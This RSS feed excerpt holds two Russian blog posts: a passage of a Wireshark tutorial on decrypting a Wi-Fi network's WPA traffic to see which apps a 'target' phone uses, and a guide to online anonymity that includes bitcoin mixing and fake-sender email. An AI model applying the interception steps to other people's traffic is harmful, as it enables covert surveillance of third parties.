  <p>Для этого вам понадобится карта адаптера беспроводной сети, поддерживающая режим беспроводного монитора. Вы можете ознакомиться с нашими руководствами по выбору, который совместим с Kali и поддерживает режим монитора.</p>
  <p>Затем вам понадобится смартфон на базе iOS или Android, подключенный к контролируемой сети Wi-Fi. Вы можете практиковать это в открытой сети Wi-Fi, чтобы увидеть то, что вы должны увидеть, так как иногда расшифровка может не сработать в первый раз. Вам также необходимо знать пароль и сетевое имя сети Wi-Fi, которую вы хотите отслеживать. Это позволит вам рассчитать предварительный общий ключ, что позволит нам расшифровать трафик в режиме реального времени.</p>
  <h4><br /></h4>
  <h4>1. Загрузите Wireshark и подключитесь к сети Wi-Fi</h4>
  <p>Загрузите и установите Wireshark, если он еще не установлен, и подключитесь к сети Wi-Fi, на которой находится ваша цель. Если вы планируете использовать PSK, а не сетевой ключ, вам следует рассчитать его с помощью инструмента Wireshark, так как вы можете не иметь доступа к интернету во время захвата, в зависимости от вашей карты.</p>
  <p>Загрузив Wireshark, откройте его и посмотрите на сетевые интерфейсы. Прежде чем мы начнем захват, нам нужно настроить несколько параметров, чтобы убедиться, что карта записывается в правильном режиме.</p>
  <figure class="m_column">
    <img src="https://telegra.ph/file/762eaf21c1c3624d68108.png" width="1000" />
  </figure>
  <p><br /></p>
  <h4>2. Настройте Wireshark для захвата</h4>
  <p>Под опцией меню Wireshark выберите меню «Capture Options» в форме шестеренки.</p>
  <figure class="m_column">
    <img src="https://telegra.ph/file/c7391a03ee0f3d3aef093.png" width="854" />
  </figure>
  <p><br /></p>
  <p>Откроется окно «Capture interfaces», как показано ниже.</p>
  <figure class="m_column">
    <img src="https://telegra.ph/file/a826c287648113c10d2ea.png" width="1000" />
  </figure>
  <p><br /></p>
  <h4>3. Начните захват сети и сканирование пакетов EAPOL</h4>
  <p>Если вы не подключены к сети, в которой находится ваша цель, вы не сможете видеть какие-либо пакеты, потому что вы можете быть на каком-то другом случайном канале. Wireshark не может фактически изменить канал, на котором включен адаптер беспроводной сети, поэтому, если вы ничего не получаете, это может быть причиной.</p>
  <figure class="m_column">
    <img src="https://telegra.ph/file/90d1e8f5cbcad17a67a3e.png" width="1000" />
  </figure>
  <figure class="m_column">
    <img src="https://telegra.ph/file/9fa3b24c0e736d9612fe5.png" width="1456" />
  </figure>
  <p><br /></p>
  <h4>4. Расшифровывать трафик с помощью сетевого PSK</h4>
  <p>Теперь, когда у нас есть рукопожатия, мы можем расшифровать разговор с этого момента. Для этого нам нужно добавить сетевой пароль или PSK. Перейдите в раскрывающееся меню «Wireshark» и выберите «Preference». После выбора нажмите «Protocols». </p>
  <figure class="m_column">
    <img src="https://telegra.ph/file/beff6f60de43fb117eeec.png" width="1000" />
  </figure>
  <p>В разделе «Protocols» выберите «IEEE 802.11» и нажмите «Enable decryption». Чтобы добавить сетевой ключ, нажмите «Edit» рядом с «Decryption keys», чтобы открыть окно для добавления паролей и PSK.</p>
  <figure class="m_column">
    <img src="https://telegra.ph/file/d497ce0ae4d21482606ad.png" width="1000" />
  </figure>
  <p>Выберите в меню «wpa-psk», а затем вставьте ключ. Нажмите Tab, затем сохраните, нажав «ОК».</p>
  <figure class="m_column">
    <img src="https://telegra.ph/file/eebcf869a7921558dac70.png" width="1102" />
  </figure>
  <p>После этого нажмите «ОК» в меню «Preferences, и Wireshark должен повторно отсканировать все захваченные пакеты и попытаться расшифровать их. Это может не сработать по разным причинам. Я смог заставить его работать большую часть времени, обеспечив хорошее рукопожатие (EAPOL) и переключаясь между сетевым паролем и PSK. Если это работает, мы можем перейти к этапу анализа трафика, чтобы выбрать используемые приложения.</p>
  <h4><br /></h4>
  <h4>5. Сканирование на наличие пакетов DNS и HTTP.</h4>
  <p>Теперь, когда мы сняли защиту от трафика, Wireshark может расшифровать их и сообщить нам, что устройства в этой сети Wi-Fi, для которых у нас есть рукопожатия, делают в режиме реального времени.</p>
  <ol>
    <li>DNS-запросы</li>
  </ol>
  <p>Чтобы увидеть интересные пакеты, мы начнем с DNS-запросов. DNS-запросы - это то, как приложения проверяют, не изменились ли IP-адреса, к которым они должны подключаться. Они будут направлены на доменные имена, в которых обычно содержится название приложения, что упрощает просмотр приложения на телефоне iPhone или Android и выполнение запросов.</p>
  <p>Чтобы увидеть эти запросы, мы будем использовать два фильтра захвата, dns и http, которые покажут нам наиболее очевидные отпечатки пальцев, которые приложение оставляет через Wi-Fi. Сначала введите dns в строку фильтра захвата и нажмите Enter. Если это не работает, попробуйте переключиться между PSK и паролем несколько раз. Это отстой, но иногда это начнет работать.</p>
  <figure class="m_column">
    <img src="https://telegra.ph/file/71c5cb1f28ebf0b8a2dea.png" width="1000" />
  </figure>
  <p>Если ваша цель чувствует себя одиноко, вы можете увидеть ответ ниже. Tinder вызывает домен Tindersparks.com, а также множество других сервисов. Этот запрос является одним из самых очевидных.</p>
  <figure class="m_column">
    <img src="https://telegra.ph/file/3e9c0f4986eb4a0dda505.png" width="1000" />
  </figure>
  <p>Хотя использование Signal - хорошая идея, лучше использовать его с VPN. Причина? Даже открытие Signal создает обмен ниже, четко идентифицируя, что пользователь общается с зашифрованным мессенджером.</p>
  <figure class="m_column">
    <img src="https://telegra.ph/file/920abbedd01c9d8d10f77.png" width="1000" />
  </figure>
  <p>Попытка найти ту песню, которая играет с Shazam, оставляет следующий отпечаток.</p>
  <figure class="m_column">
    <img src="https://telegra.ph/file/fd66993a2148888560a2c.png" width="1000" />
  </figure>
  <p>Открытие приложения для вызова Uber создает запросы, которые вы видите ниже.</p>
  <figure class="m_column">
    <img src="https://telegra.ph/file/b2ba674a6a26a0e666431.png" width="1000" />
  </figure>
  <p>Ниже мы видим эффект открытия Venmo и приложения для перевода денег. Кажется, пришло время перенаправить этот запрос в другое место.</p>
  <figure class="m_column">
    <img src="https://telegra.ph/file/90a31303159c3c56e9360.png" width="1000" />
  </figure>
  <p><br /></p>
  <p><strong>2. Пакеты HTTP</strong></p>
  <p>Далее мы можем увидеть несколько небезопасных веб-запросов, используя фильтр захвата http. Эти фильтры захвата содержат такую информацию, как useragent, который сообщает нам тип устройства, которое подключается. Мы можем проверить это, нажав на пакеты и развернув вкладку «Hypertext Transfer Protocol».</p>
  <figure class="m_column">
    <img src="https://telegra.ph/file/2d0f78bd4f61e8096e41b.png" width="1000" />
  </figure>
  <p>В этом примере мы видим небезопасные HTTP-запросы к серверу чата. Что, черт возьми это? Простое изучение пакета и разрешение домена сразу же дает нам ответ. Это WeChat! В этом телефоне установлен WeChat, и, кроме того, сообщения, которые из него поступают, не полностью зашифрованы.</p>
  <figure class="m_column">
    <img src="https://telegra.ph/file/ce813ce41d3c8e42784ab.png" width="1000" />
  </figure>
  <figure class="m_column">
    <img src="https://telegra.ph/file/7b6463bc46807c44c4545.png" width="1000" />
  </figure>
  <p>Если мы хотим увидеть все, что было решено, мы можем нажать на вкладку меню «Statistics» и выбрать «Resolved Addresses», чтобы увидеть все домены, которые были разрешены в течение захвата. Это должен быть список услуг, к которым устройство подключается через приложения, запущенные на нем.</p>
  <figure class="m_column">
    <img src="https://telegra.ph/file/cf0267c952f6f785b03da.png" width="1000" />
  </figure>
  <p>Эта разбивка делает еще проще увидеть, что цель была до этого.</p>
  <h4><br /></h4>
  <h4>Wireshark для Wi-Fi рискованная штука</h4>
  <p>Этот вид мониторинга может показаться инвазивным, но вы должны помнить, что ваш интернет-провайдер также ведет журнал этой информации и имеет право продавать эту информацию. Если вы хотите предотвратить такого рода отслеживание, вам нужен VPN, такой как Mullvad или PIA, который позволяет скрывать даже локальный трафик за надежным шифрованием. В местах, где вы, возможно, делаете что-то деликатное при подключении к данным, вам также следует по возможности использовать сотовые данные для предотвращения такого рода атак.</p>
  <p><br />  </p>

]]></content:encoded></item><item><guid isPermaLink="true">https://teletype.in/@krakenteam/BJ0MhaWML</guid><link>https://teletype.in/@krakenteam/BJ0MhaWML?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=krakenteam</link><comments>https://teletype.in/@krakenteam/BJ0MhaWML?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=krakenteam#comments</comments><dc:creator>krakenteam</dc:creator><title>Как сохранять полную анонимность в интернете</title><pubDate>Fri, 31 Jan 2020 15:47:33 GMT</pubDate><media:content medium="image" url="https://telegra.ph/file/fcfd884d4b9e61838ebbf.jpg"></media:content><description><![CDATA[<img src="https://telegra.ph/file/fcfd884d4b9e61838ebbf.jpg"></img>KRAKENteam (взято у XAKERU)]]></description><content:encoded><![CDATA[
  <p>KRAKENteam (взято у XAKERU)</p>
  <p>Сохранение анонимности в глобальной сети является непростой задачей. Сегодняшний интернет основан на рекламе и системах наблюдения, которые хотят, чтобы вы постоянно были на виду. Будь то национальная безопасность или желание продать вам смартфон, правительства и компании хотят знать о вас всё что можно. Непросто сбить их со следа.</p>
  <p>Сохранить анонимность в сети можно, но со временем это всё труднее. Никакие меры нельзя назвать идеальными. И всё же, можно затруднить слежку за вами.</p>
  <p><br /></p>
  <p>Анонимность имеет свои преимущества. Невозможность узнать вас и отследить ваши следы даёт определённую свободу. Правда, ради этой свободы придётся кое-чем пожертвовать. Многие удобства современного интернета основаны на составлении профилей пользователей, отслеживании и анализе поведения.</p>
  <p>С учётом этого мы опишем шаги, которые можно предпринять, и инструменты для обеспечения анонимности в интернете.</p>
  <h3><br /></h3>
  <figure class="m_column">
    <img src="https://telegra.ph/file/fcfd884d4b9e61838ebbf.jpg" width="1000" />
  </figure>
  <h3>Tor</h3>
  <p>Список инструментов для обеспечения анонимности не будет полным без сети Tor. Эта сеть состоит из узлов добровольцев по всему миру и является синонимом анонимности. Слово Tor является сокращением от The Onion Router. Сеть позволяет зашифровать ваш трафик и каждый раз при подключении к веб-серверу направлять этот трафик через случайным образом выбранные узлы, прежде чем он достигнет точки назначения.</p>
  <p>Существуют десятки способов использовать Tor на разных устройствах. Самым популярным является <a href="https://www.torproject.org/download/" target="_blank">Tor Browser</a>. Нужно установить основанное на Firefox приложение на компьютер на Windows или Mac, чтобы выходить в сеть анонимно. На Android попробуйте Orbot. На платформе iOS официальная поддержка Tor отсутствует, но браузер Onion Browser кажется приличным вариантом.</p>
  <figure class="m_column">
    <img src="https://telegra.ph/file/9cb9930a5ad629e6d2f83.png" width="812" />
  </figure>
  <p>У Tor есть несколько недостатков, в первую очередь низкая скорость доступа. Этот вариант не годится для просмотра видео или скачивания торрентов. Можно бродить по сайтам в интернете, на этом возможности Tor кончаются. Ресурсов добровольцев не хватает для более быстрого доступа.</p>
  <p>Во-вторых, хотя ваш интернет-трафик будет зашифрован и отследить его нельзя, провайдер сможет понять, что вы используете Tor. Это может вызвать его подозрения, поскольку Tor часто используется для преступной деятельности. Провайдер может сократить вашу скорость доступа в интернет, послать предупреждение, сообщить о вас властям, даже если вы не делали ничего плохого.</p>
  <p>По этой причине вместе с Tor используйте инструменты обфускации вроде Obfsproxy, включайте VPN при работе с Tor или делайте то и другое одновременно. Obfsproxy представляет собой проект Tor, который заставляет зашифрованный трафик выглядеть как незашифрованный, чтобы не привлекать лишнего внимания. О VPN будет сказано ниже.</p>
  <p>Наконец, есть слухи, что правительство США умеет анализировать трафик Tor, в результате чего произошло несколько арестов. Одним из арестованных был Dread Pirate Roberts с Silk Road. Слухи утверждают, что правительство отслеживает активность на нескольких узлах Tor. Конкретных доказательств нет.</p>
  <h3><br /></h3>
  <h3>Live OS</h3>
  <p>Браузер подходит для того, чтобы вас не отследили рекламодатели и для периодических визитов в DarkNet. Однако, если вам нужна полная анонимность, требуется ядерный вариант. Хотя никто не может отследить вашу активность в Tor Browser, наверняка у вас множество приложений работают в фоновом режиме. Это программы для работы с текстом, видеоплееры, различные менеджеры, которые отправляют данные в интернет. Предполагается, что власти используют незашифрованные отчёты об ошибках системы Windows для поиска людей. Windows 10 содержит большой объём отслеживающего программного обеспечения, всё это по умолчанию включено.</p>
  <p>Вы можете отключить все эти настройки и удалить все свои приложения, но это непрактичное решение. Вместо этого лучше использовать живую операционную систему. Она устанавливается с флешки или DVD. Изменив несколько настроек в BIOS компьютера, вы можете запустить полностью независимую операционную систему с носителя.</p>
  <p>Официальной живой операционной системой проекта Tor является <a href="https://tails.boum.org/" target="_blank">Tails</a>. Весь интернет-трафик, не только в браузере, проходит через сеть Tor. Система не оставляет следов на вашем компьютере и все мгновенные сообщения, электронные письма и файлы зашифрованы. С ней легко работать и здесь есть защита от дурака.</p>
  <p>Если Tails вам по каким-то причинам не подходит, другим вариантом является <a href="https://www.whonix.org/" target="_blank">Whonix</a>. Это независимая живая операционная система. Там применяется виртуальная машина в вашей реальной операционной системе. Здесь есть все преимущества Tails, тоже используется сеть Tor, при этом невозможны утечки IP-адреса. Вот только вам потребуется достаточно мощный компьютер для запуска виртуальной машины и процесс настройки довольно сложный.</p>
  <p>Среди других вариантов можно назвать <a href="https://www.whonix.org/" target="_blank">Kali</a>, <a href="https://www.qubes-os.org/" target="_blank">Qubes</a> и <a href="https://krebsonsecurity.com/2014/07/wireless-live-cd-alternative-zeusgard/" target="_blank">ZeusGuard</a>. Поищите информацию о них, чтобы узнать больше.</p>
  <h3><br /></h3>
  <h3>VPN без логов</h3>
  <p>Виртуальные частные сети зашифровывают весь трафик на устройстве и направляют через промежуточный сервер до нужной точки. Ваш реальный IP-адрес скрывается и сторонние наблюдатели, в том числе ваш провайдер, не могут вести мониторинг трафика.</p>
  <p>Большинство провайдеров VPN используют на своих серверах общие IP-адреса. Десятки, сотни и даже тысячи людей получают одинаковый IP-адрес. В результате почти невозможно отследить активность конкретного человека среди такого большого количества людей.</p>
  <figure class="m_column">
    <img src="https://telegra.ph/file/62076730866323c45689c.png" width="640" />
  </figure>
  <p>VPN созданы для конфиденциальности, а не анонимности. Не стоит использовать исключительно VPN, если вы хотите по-настоящему спрятаться. Конфиденциальность и анонимность часто путают, но есть важное отличие. Анонимность означает, что никто не сможет идентифицировать вас. Конфиденциальность означает, что никто не может видеть, что вы делаете.</p>
  <p>Использование VPN требует определённой степени доверия к провайдеру и его серверам. Мало какие провайдеры VPN обладают собственной инфраструктурой серверов. Ваш трафик зашифровывается на ваших жёстких дисках и остаётся зашифрованным до тех пор, пока не прибудет в место назначения. В течение короткого момента времени ваша активность видна провайдеру VPN.</p>
  <p>По этой причине рекомендуется работать с провайдерами, которые не ведут логов. Это означает, что провайдер не сохраняет информацию о содержимом трафика пользователей. Если провайдер говорит правду насчёт отсутствия логов, это плюс.</p>
  <p>В реальности не всё так просто. Некоторые провайдеры обещают отсутствие логов, но сохраняют кое-какие метаданные. В зависимости от того, насколько анонимным вы хотите быть, этот нюанс может быть важен. Метаданные не содержат информации о вашем трафике, но там могут быть сведения о том, когда вы пользовались VPN, как долго, сколько данных передали, даже ваш реальный IP-адрес. Всегда читайте политику конфиденциальности VPN-провайдера, чтобы получить информацию о таких деталях.</p>
  <p>Даже немногочисленные VPN-провайдеры с реальным отсутствием логов требуют доверия со стороны клиентов. Мы никак не можем проверить, говорит провайдер правду или нет, и как он будет реагировать на запрос данных со стороны правительственных органов. Для обеспечения максимального уровня анонимности используйте VPN одновременно с Tor. Избегайте VPN на территории США и Европы, где законы о сохранении пользовательских данных и правительственные спецслужбы могут подвергнуть вашу анонимность риску.</p>
  <p>Используйте Tor Browser вместе с VPN, что вдвое усложнит отслеживание. VPN можно настроить вручную в живых операционных системах вроде Tails.</p>
  <h3><br /></h3>
  <h3>DNS без логов</h3>
  <p>Когда вы вводите в адресную строку браузера URL, запрос отправляется на сервер DNS, чтобы найти IP-адрес, который соответствует указанному URL. Даже при использовании прокси вроде VPN эти запросы DNS могут отправляться за пределами зашифрованного туннеля на сервер по умолчанию. По умолчанию запросы DNS обычно идут и записываются на ближайший сервер вашего провайдера.</p>
  <p>Если это случается во время работы с VPN, это называется утечка DNS. Многие провайдеры VPN предлагают защиту от утечек DNS, при которой весь интернет-трафик, включая запросы DNS, проходит через VPN. Эти провайдеры обычно работают с собственными серверами DNS, где не записывается, какие сайты вы посещаете, если обещается не вести логов.</p>
  <p>Даже если VPN рекламирует защиту от утечек DNS, это утверждение может относиться только к утечкам IPv4. Запросы IPv6 DNS по-прежнему могут передаваться в сети по умолчанию и их видят веб-серверы и провайдеры. Было бы хорошо, если бы всё больше провайдеров VPN использовали серверы IPv6 DNS, но пока лучшим решением является отключение IPv6 в настройках интернета на вашем устройстве. Вот инструмент для проверки утечек IPv6 и IPv4 DNS.</p>
  <p>Если у вашего VPN-провайдера нет защиты от утечек DNS или если вы вообще не пользуетесь DNS, попробуйте выбрать публичный сервис DNS без ведения логов. Можете поменять настройки DNS на устройстве, чтобы запросы не проходили через сервер вашего провайдера. Рекомендуются серверы <a href="https://dns.watch/index" target="_blank">DNS.WATCH</a> или <a href="https://www.opennic.org/" target="_blank">OpenNIC</a>.</p>
  <h3><br /></h3>
  <h3>Временная электронная почта</h3>
  <p>Чтобы оставаться анонимным, нельзя входить в ваши существующие учётные записи. Между тем, многие веб-сайты и приложения требуют входа в аккаунт. В таком случае могут пригодиться временные адреса электронной почты.</p>
  <p>Несколько сервисов предлагают бесплатные фальшивые и временные адреса электронной почты. Без регистрации и сообщений рекомендуется пользоваться <a href="https://www.guerrillamail.com/" target="_blank">Guerilla Mail</a>. Здесь есть менеджер паролей, чтобы запоминать связанные с этими аккаунтами пароли.</p>
  <figure class="m_column">
    <img src="https://telegra.ph/file/900c1d5e2809198d0751f.png" width="818" />
  </figure>
  <p>Для более долгосрочных неотслеживаемых почтовых адресов лучшим вариантом может считаться <a href="https://protonmail.com/" target="_blank">ProtonMail</a>. Это сервис со сквозным шифрованием с открытым исходным кодом, используются приложения для веба и мобильных устройств без раскрытия секретных данных. К сожалению, новые пользователи должны получить приглашение, поскольку возможности сервера ограничены. ProtonMail работает на основе пожертвований.</p>
  <p>Если вы не хотите ждать приглашения, альтернативой является <a href="http://zmail.sourceforge.net/" target="_blank">Zmail</a>. Тут можно отправлять письма с фейковых адресов.</p>
  <p>Никогда не используйте свой настоящий электронный адрес, когда пытаетесь сохранить анонимность. Даже не читайте электронные письма и не заходите в аккаунт. Если вы хотите отправить зашифрованное письмо с временного адреса, нужно настроить новые ключи PGP или S/MIME.</p>
  <h3><br /></h3>
  <h3>Криптовалюты</h3>
  <p>Если вы хотите сделать анонимную покупку или пожертвовать деньги, криптовалюты лучше, чем кредитные карты или платёжные системы вроде PayPal. Что не означает, что вы просто должны открыть биткоин-кошелек на крупных биржах вроде Coinbase, и начать тратить деньги.</p>
  <p>Существует заблуждение о том, что биткоин всегда анонимный. На самом деле природа блокчейна такова, что каждая транзакция отслеживается и подтверждается. Эти публично доступные записи можно проанализировать, привязав ваши кошельки и транзакции к вашей личности.</p>
  <p><br /></p>
  <p>Проанализировав активность, которая видна в публичном блокчейне любому желающему, обозреватель может связать вашу личность со всеми вашими кошельками и историей транзакций. В результате биткоин может быть даже менее конфиденциальным, чем банковский счёт.</p>
  <p>Чтобы обойти это, используйте кошельки, которые меняют адрес после каждой транзакции. Отследить их будет труднее. Используйте также сервисы смешивания биткоина, где ваши деньги кладутся в общий пул с деньгами других людей и перемешиваются, прежде чем платёж отправится получателю.</p>
  <p>Самое сложное заключается в анонимной покупки биткоинов, поскольку для этого нужны реальные деньги. Приватные сделки и биржи типа peer-to-peer вроде <a href="https://localbitcoins.com/" target="_blank">LocalBitcoins</a> обеспечат максимальную анонимность при получении криптовалюты.</p>
  <p>Помните, что биткоин является не единственной криптовалютой, хотя и самой популярной. Существует множество других криптовалют, вроде Litecoin, DarkCoin, Dogecoin.</p>
  <h3><br /></h3>
  <h3>Поисковые системы</h3>
  <p>Google отслеживает каждый ваш поисковый запрос. Если вы пользуетесь Tor, это неважно, но всё же желательно найти другой вариант для поиска.</p>
  <p>Например, <a href="https://duckduckgo.com/" target="_blank">DuckDuckGo</a>. Это один из самых популярных поисковых сервисов, который не наблюдает за профилями пользователей. Его можно установить в качестве поисковой системы по умолчанию в вашем браузере.</p>
  <p>DuckDuckGo представляет собой полностью независимый браузер, поэтому результаты будут не такие полноценные, как в Google. К счастью, можно получить результаты из Google без самой Google.</p>
  <figure class="m_column">
    <img src="https://telegra.ph/file/c21d07b23c5a37f31edc8.png" width="733" />
  </figure>
  <p><a href="https://www.startpage.com/" target="_blank">StartPage</a> убирает идентифицирующую вас информацию и выполняет каждый поисковый запрос в Google вместо вас. Записей о пользовательской активности не ведётся. Все поисковые результаты отображаются со ссылкой на прокси под ними, позволяя перейти на любой сайт через прокси и сохранить при этом конфиденциальность.</p>
  <h3><br /></h3>
  <h3>Передача файлов</h3>
  <p>Бывает, что нужно отправить кому-то анонимно файл, слишком крупный для вложения в электронное письмо. Например, вы хотите опубликовать какие-то документы, но чтобы никто не знал, что это сделали вы. В таком случае выложить файлы в Dropbox будет недостаточно.</p>
  <p><a href="https://www.filedropper.com/" target="_blank">FileDropper</a> является простым и удобным решением, где можно загружать до 5 Гб данных без регистрации. <a href="https://wetransfer.com/" target="_blank">WeTransfer</a> является ещё одним вариантом, который позволяет выкладывать до 2 Гб данных без регистрации. В таких сервисах можно выложить файлы и отправить ссылки на них.</p>
  <p>Не забывайте заходить на эти сайты при помощи Tor и делиться ссылками при помощи временной электронной почты или других методов анонимности. Сайт может собирать информацию о посетителях, пусть даже регистрация не нужна.</p>
  <h3><br /></h3>
  <h3>Тщательно выбирайте расширения для браузера</h3>
  <p>Tor Browser мало поддерживается в расширениях браузеров, на что есть причина. Рекламодатели отслеживают пользователей всё более изощрённо. Одним из самых продвинутых методов слежки является фингерпринтинг. Собирая сведения о вашем веб-браузере, какие расширения установлены, какое устройство у вас, на каком языке и т.д., компании создают ваш профиль.</p>
  <p>Это даже лучше, чем IP-адрес. Вы можете перезагрузить маршрутизатор или задействовать VPN и ваш IP-адрес изменится. При этом у вас останется прежний компьютер или мобильное устройство, прежний процессор и объём памяти, браузер и прочие определяющие характеристики.</p>
  <p>Многие расширения помогают поддерживать конфиденциальность. Среди них можно назвать ABP, Disconnect, Privacy Badger, HTTPS Everywhere. Однако, они же вносят вклад в формирование профилей фингерпринтинга. Это одна из причин того, почему трудно сохранить анонимность в популярных браузерах вроде Firefox или Chrome.</p>
  <p>Если вы хотите протестировать, как хорошо браузер защищает вас от слежки, откройте <a href="https://panopticlick.eff.org/" target="_blank">веб-сайт Panopticlick</a>. Этот инструмент от Electronic Frontier Foundation (EFF) подробно показывает, как рекламное агентство может определить ваш браузер при помощи уникального отпечатка.</p>
  <p>Кроме фингерпринтинга, расширения браузеров могут общаться с серверами незаметно для вас. Потенциально они могут записывать мета-данные, которые могут определить вас и вашу сетевую активность.</p>
  <h3><br /></h3>
  <h3>Зашифрованное общение</h3>
  <p>Кроме электронной почты вы можете захотеть спрятать следы отправки сообщений и звонков. Шифрование больше предназначается для конфиденциальности, чем для анонимности. Даже если сообщение зашифровано, можно определить отправителя и получателя. Впрочем, для достижения анонимности можно кое-что сделать.</p>
  <p><a href="https://signal.org/" target="_blank">Signal</a> является самым популярным приложением для зашифрованных голосовых звонков на смартфонах. Также здесь есть мгновенный обмен сообщениями. Пользователи могут подтверждать идентичность своих контактов при помощи сравнения ключевых отпечатков.</p>
  <figure class="m_column">
    <img src="https://telegra.ph/file/8dab5ebbd3fdbd265b37b.png" width="737" />
  </figure>
  <p>Для зашифрованных текстовых и мультимедийных сообщений существует множество бесплатных и приватных опций. <a href="https://github.com/prof7bit/TorChat/downloads" target="_blank">TorChat</a> использует зашифрованные сообщения peer-to-peer в сети Tor. Здесь не нужна установка и запускать приложения можно с флешки. Среди альтернатив можно назвать <a href="https://pidgin.im/" target="_blank">Pidgin</a> и <a href="https://crypto.cat/" target="_blank">CryptoCat</a>.</p>
  <h3><br /></h3>
  <h3>Зашифрованные резервные копии</h3>
  <p>Даже при сохранения анонимности нужно выполнять резервное копирование и хранить большие файлы. Иногда требуется давать к ним доступ другим людям. Держитесь подальше от Google Drive и Dropbox, поскольку здесь нет защиты конфиденциальности вроде шифрования и нет никакой анонимности.</p>
  <p>Резервные копии лучше делать локально на зашифрованном внешнем жёстком диске. Crashplan предлагает бесплатную версию своей программы для этого.</p>
  <figure class="m_column">
    <img src="https://telegra.ph/file/dead4d9f1fe1ebe6e1b91.png" width="915" />
  </figure>
  <p>Если вы хотите облачный сервис, нужен доверенный провайдер. Выбирайте сервис вида zero knowledge, который позволяет задавать собственные ключи шифрования. Это доступно в <a href="https://spideroak.com/" target="_blank">SpiderOak</a>, iDrive, BackBlaze, Crashplan, что не позволит провайдеру расшифровать ваши файлы.</p>
  <p>Если вы хотите работать с Google Drive, Dropbox или другими хранилищами без шифрования, можно сначала зашифровать файлы, прежде чем отправлять их в облако.</p>
  <p><br /></p>
  <h3>Безопасность веб-камеры</h3>
  <p>Известно, что веб-камеры можно активировать дистанционно и шпионить за пользователями. Марк Цукерберг и глава ФБР даже наклеивают на них изоленту.</p>
  <p>Дистанционно активировать веб-камеры могут вредоносные приложения. Система защиты от вирусов в реальном времени и периодическое антивирусное сканирование помогут защититься от этого. Если у вашего ноутбука есть светодиодный индикатор, который загорается при активации камеры, убедитесь, что этот индикатор работает. Если вы не хотите заклеивать камеру изолентой, закрывайте ноутбук, когда не работаете с ним.</p>
  <h3><br /></h3>
  <h3>Обеспечение безопасности маршрутизатора Wi-Fi</h3>
  <p>Многие пользователи даже не думают о том, чтобы поменять настройки маршрутизатора после его покупки. Незащищённые маршрутизаторы могут стать целью злоумышленников. Можно перехватывать трафик, читать, вносить в него изменения. Если вы в чужой сети Wi-Fi, желательно использовать VPN.</p>
  <p>Если вы хотите оставаться анонимным, важно изменить логин и пароль на вход в настройки маршрутизатора, обновлять прошивку, задать самый серьёзный уровень шифрования (обычно WPA2), ограничить входящий и исходящий трафик, отключить WPS, отключить неиспользуемые сервисы, проверить порт 32764, включить и читать логи, выходить из маршрутизатора после завершения работы.</p>
  <h3><br /></h3>
  <figure class="m_column">
    <img src="https://telegra.ph/file/b86cfb7f2af77d3d71ea5.jpg" width="1280" />
  </figure>
  <h3>iOS и Android не лучшим образом подходят для обеспечения анонимности</h3>
  <p>Если вы выбираете устройство на Android или iOS по критерию анонимности, используйте Android. Однако, даже здесь полная анонимность вам недоступна.</p>
  <p>На смартфоне поддерживать анонимность намного тяжелее, чем на компьютере. Инструменты анонимности Tor не настолько развитые, чтобы хорошо работать на мобильных устройствах. Apple и Google тесно связаны с этими устройствами. Вы можете заходить на сайты onion при помощи приложения Orbot на Android, но этим ваши возможности и ограничены. Официальные браузеры Tor для iOS отсутствуют.</p>
  <p>Отсутствуют живые операционные системы, с которыми могли бы работать смартфоны, как TAILS на компьютерах.</p>
  <p>У смартфонов есть номера IMEI, MAC-адреса, уязвимости в операционной системе, которые невозможно закрыть и которые могут быть использованы для определения конкретного устройства при его выходе в интернет. Поскольку производители обычно вносят изменения в Android, сложно сказать, какие уязвимости есть в конкретных устройствах. Apple и Google могут отслеживать любое устройство на iOS и Android соответственно.</p>
  <p>Приложения постоянно общаются с серверами в интернете, передавая данные туда-сюда. Эти данные позволяют отследить пользователей. Даже такая простая вещь, как программная клавиатура, может применяться для анализа активности. Камеры и микрофоны могут быть взломаны для шпионажа за пользователями. Когда устройство получает сигнал от сотовой вышки, определяется его местоположение. В общем, на Android и iOS происходит много такого, чего пользователи не могут контролировать.</p>
  <p>Хотя попытка сделать смартфоны полностью анонимными кажется бессмысленной, можно сделать их значительно более конфиденциальными. На Android можно зашифровать устройство, iPhone зашифрованы по умолчанию. Использование VPN шифрует трафик, можно также задать последовательность самоуничтожения, если несколько раз неправильно ввести пароль или пин-код.</p>
  <p>Наконец, компании вроде Silent Circle выпускают Android-смартфоны с прицелом на безопасность. Например, <a href="https://www.silentcircle.com/products-and-solutions/silent-os/" target="_blank">Blackphone</a> полностью зашифрован и работает с несколькими виртуальными телефонами для разделения данных по категориям. Silent Circle предлагает сервис с подпиской для обеспечения конфиденциальности iPhone. Как уже говорилось выше, здесь обеспечивается конфиденциальность, а не анонимность. Содержимое смартфона будет защищено, но можно будет узнать, чей это смартфон.</p>
  <h3><br /></h3>
  <h3>Опасайтесь интернета вещей</h3>
  <p>Интернет вещей открывает новые возможности для хакеров и шпионажа. Многие производители устройств интернета вещей о безопасности думают в последнюю очередь. Простая запись о том, в какое время дня включается умный кондиционер, может дать подсказку о привычках его владельца. Критики предупреждали об опасности работы с устройствами вроде Amazon Echo, которые всегда слушают голосовые команды, даже когда выключены.</p>
  <p>В зависимости от вашей сетевой активности это может быть угрозой для анонимности пользователя. Используйте устройства интернета вещей с осторожностью.</p>
  <h3><br /></h3>
  <h3>Создайте список необходимых мер</h3>
  <p>Ни один инструмент анонимности не является идеальным, даже Tor. Это не означает, что они неэффективные. Хотя богатые корпорации или правительственные организации могут потратить много времени и денег на анализ трафика в сети Tor и в конечном счете найдут человека, которого ищут, скорее пользователь сам совершит ошибку и выдаст себя.</p>
  <p>Как избежать таких ошибок? Можно составить список. Каждый раз, когда вы хотите сохранить анонимность в сети, сверяйтесь со списком. Запишите его на листке бумаги, но не записывайте здесь никаких логинов и паролей и другой идентифицирующей информации. Вот как может выглядеть этот список:</p>
  <ul>
    <li>Подключайтесь к сервису VPN без логов</li>
    <li>Выходите в интернет через Tor Browser/Tails</li>
    <li>Используйте сервер DNS без логов</li>
    <li>Выходите из всех сетевых аккаунтов после завершения работы</li>
    <li>Закрывайте все приложения и фоновые сервисы с подключением к интернету</li>
    <li>Отключайте и блокируйте всю слежку в браузере и операционной системе</li>
    <li>Отправляйте письма через временную электронную почту</li>
    <li>Регистрируйте новые аккаунты и входите в них через временную электронную почту</li>
    <li>Ищите информацию при помощи DuckDuckGo и StartPage</li>
    <li>Смешивайте биткоины и используйте сторонние кошельки</li>
  </ul>
